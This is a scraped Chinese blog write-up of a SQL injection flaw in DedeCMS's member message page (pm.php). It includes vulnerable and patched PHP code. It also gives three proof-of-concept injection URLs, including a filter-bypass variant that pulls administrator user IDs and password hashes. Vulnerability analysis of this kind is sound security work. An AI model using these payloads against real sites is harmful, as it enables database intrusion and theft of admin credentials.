zoukankan      html  css  js  c++  java
  • dedecms /member/pm.php SQL Injection Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Dedecms会员中心注入漏洞

    Relevant Link

    http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html


    2. 漏洞触发条件

    0x1: POC1

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

    0x2: POC2

    如果报错: Safe Alert: Request Error step 1 !

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

    0x3: POC3

    报错注入

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    Relevant Link

    http://www.myhack58.com/Article/html/3/62/2014/42255.htm


    3. 漏洞影响范围
    4. 漏洞代码分析

    /member/pm.php

    else if($dopost=='read')
    {
        $sql = "SELECT * FROM `#@__member_friends` WHERE  mid='{$cfg_ml->M_ID}' AND ftype!='-1'  ORDER BY addtime DESC LIMIT 20";
        $friends = array();
        $dsql->SetQuery($sql);
        $dsql->Execute();
        while ($row = $dsql->GetArray()) 
        {
            $friends[] = $row;
        }
        //$id注入
        $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤
        if(!is_array($row))
        {
            ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
            exit();
        }
        //$id注入
        $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
        $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
        include_once(dirname(__FILE__).'/templets/pm-read.htm');
        exit();
    }

    Relevant Link

    http://0day5.com/archives/1313


    5. 防御方法

    /member/pm.php

    else if($dopost=='read')
    {
        $sql = "Select * From `#@__member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";
        $friends = array();
        $dsql->SetQuery($sql);
        $dsql->Execute();
        while ($row = $dsql->GetArray()) 
        {
            $friends[] = $row;
        }
        /* $id过滤 */
        $id = intval($id);
        /* */ 
        $row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
        if(!is_array($row))
        {
            ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
            exit();
        }
        $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
        $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
        include_once(dirname(__FILE__).'/templets/pm-read.htm');
        exit();
    }


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    [转]JIRA 7.2.6与Confluence 6.0.3的安装与配置之MS SQL Server版
    Vue中computed和watch使用场景和方法
    vue插槽 slot 插槽之间的父子传参
    VUE 父子组件的传递 props、$ref 、 $emit、$parent、$children、$root
    div水平居中 垂直居中
    三次握手 四次挥手
    TCP/IP各层网络协议的通俗理解
    学习 cookie session 正向代理和反向代理的区别
    学习vuex心得体会
    登陆界面 跟后台对接口
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4519096.html
Copyright © 2011-2022 走看看